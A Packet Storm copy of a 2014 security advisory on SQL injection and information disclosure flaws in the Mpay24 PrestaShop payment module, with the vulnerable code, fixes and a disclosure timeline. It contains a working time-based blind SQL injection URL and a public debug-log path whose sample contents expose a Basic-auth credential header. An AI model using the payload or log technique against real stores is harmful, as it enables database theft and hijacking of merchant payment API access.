exploit the possibilities

Mpay24 Payment Module 1.5 Information Disclosure / SQL Injection

Mpay24 Payment Module 1.5 Information Disclosure / SQL Injection
Posted Sep 3, 2014
Authored by Eldar Marcussen

Mpay24 Payment Module versions 1.5 and below suffer from information disclosure and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, info disclosure
advisories | CVE-2014-2008, CVE-2014-2009
MD5 | d91cc4e0bea733e9fd33f4bedc70a421

Mpay24 Payment Module 1.5 Information Disclosure / SQL Injection

Change Mirror Download
 Mpay24 PrestaShop Payment Module Multiple Vulnerabilities

- · Affected Vendor: Mpay24
- · Affected Software: Mpay24 Payment Module
- · Affected Version: 1.5 and earlier
- · Issue Type: SQL injection and information disclosure
- · Notification Date: 10 February 2014
- · Release Date: 03 September 2014
- · Discovered by: Eldar Marcussen
- · Issue status: Patch available

Summary

BAE Systems Applied Intelligence researcher, Eldar Marcussen has identified
two high impact vulnerabilities in the Mpay24 payment module for the
Prestashop e-commerce solution.

“Mpay24 is the online-payment platform for e- and m-commerce combines
frequently used and innovative payment systems in one single interface”. [
www.mpay24.com]

“Prestashop is the free ecommerce solution to start your online business
and start selling online. Build an online store for free with Prestashop.” [
www.prestashop.com]
Pre-Authentication Blind SQL Injection Requires

Mpay24 payment module present on the website.
CVE identifier

CVE-2014-2008
Description

The Mpay24 plugin version 1.5 and earlier does not sufficiently filter or
escape user supplied data used in database queries resulting in SQL
injection vulnerabilities.

The following blind SQL injection vulnerability is caused by user supplied
data being used directly in a database query, as evidenced by the offending
code:

confirm.php:12: Db::getInstance()->Execute("

confirm.php:13: UPDATE `"._DB_PREFIX_."mpay24_order` SET

confirm.php:14: `MPAYTID` = ".$_REQUEST['MPAYTID'].",

confirm.php:15: `STATUS` = '".$_REQUEST['STATUS']."'

confirm.php:16: WHERE `TID` = '".$_REQUEST['TID']."'

confirm.php:17: ");
Impact

Using this vulnerability, BAE Systems was able to extract information
directly from the database, bypassing any restrictions that may be enforced
by the application.


Proof of Concept

The following URL introduces an artificial delay in the page response time
which can be used by an attacker to extract data from the database:


http://target/path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+
Recommendation

Use prepared statements to ensure the structure of the database query
remains intact.
Pre-Authentication Information Disclosure Requires

Mpay24 configured with debug enabled (default value until version 1.6).
CVE identifier

CVE-2014-2009
Description

The Mpay24 plugin logs raw curl requests and other debugging information to
the payment gateway by default. This log file is publicly accessible and
contains information valuable to an attacker, including the base64 encoded
credentials used by the merchant to access the Mpay24 API.
Impact

Using this vulnerability, BAE Systems was able to obtain Mpay24 API
credentials and the local path of the Prestashop installation. The attacker
can use the API credentials to hijack the merchants API access and leverage
the local path disclosure with other exploits.
Proof of Concept

URL: http://target/path/modulesmapy24/api/curllog.log

* About to connect() to test.mpay24.com port 443 (#0)

* Trying 213.164.23.169...

* connected

* Connected to test.mpay24.com (213.164.23.169) port 443 (#0)

* successfully set certificate verify locations:

* CAfile: /var/www/prestashop/modules/mpay24/api/cacert.pem

CApath: /etc/ssl/certs

* SSL connection using DHE-RSA-AES256-GCM-SHA384

* Server certificate:

* subject: OU=Domain Control Validated; OU=Provided by EUNETIC GmbH;
OU=EuropeanSSL Single; CN=test.mpay24.com

* start date: 2013-05-13 00:00:00 GMT

* expire date: 2015-05-13 23:59:59 GMT

* subjectAltName: test.mpay24.com matched

* issuer: C=DE; O=EUNETIC GmbH; CN=EuropeanSSL Server CA

* SSL certificate verify ok.

* Server auth using Basic with user 'u91234'

> POST /app/bin/etpproxy_v15 HTTP/1.1

Authorization: Basic dTkxMjM0OlNPQVAxMjM=

User-Agent: mPAY24 PHP API $Rev: 5522 $ ($Date:: 2013-06-24 #$)

Host: test.mpay24.com

Accept: */*

Content-Length: 423

Content-Type: application/x-www-form-urlencoded



* upload completely sent off: 423 out of 423 bytes

* additional stuff not fine transfer.c:1037: 0 0

* HTTP 1.1 or later with persistent connection, pipelining supported

< HTTP/1.1 401 Authorization Required

< Date: Sun, 09 Feb 2014 21:04:21 GMT

< Server: Apache

* Authentication problem. Ignoring this.

< WWW-Authenticate: Basic realm="mPAY24 WebService"

< Content-Length: 401

< Content-Type: text/html; charset=iso-8859-1

<

* Connection #0 to host test.mpay24.com left intact

* Closing connection #0
Recommendation

Restrict access to webpages containing sensitive functionality or data to
authenticated users.
End User Recommendation

Update your Mpay24 plugin to version 1.6 or later.
Response Timeline

- 10/02/2014 – Vendor notified
- 13/02/2014 – Patch available through GitHub
- 19/02/2014 – CVE identifiers assigned

03/09/2014 – Advisory released


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close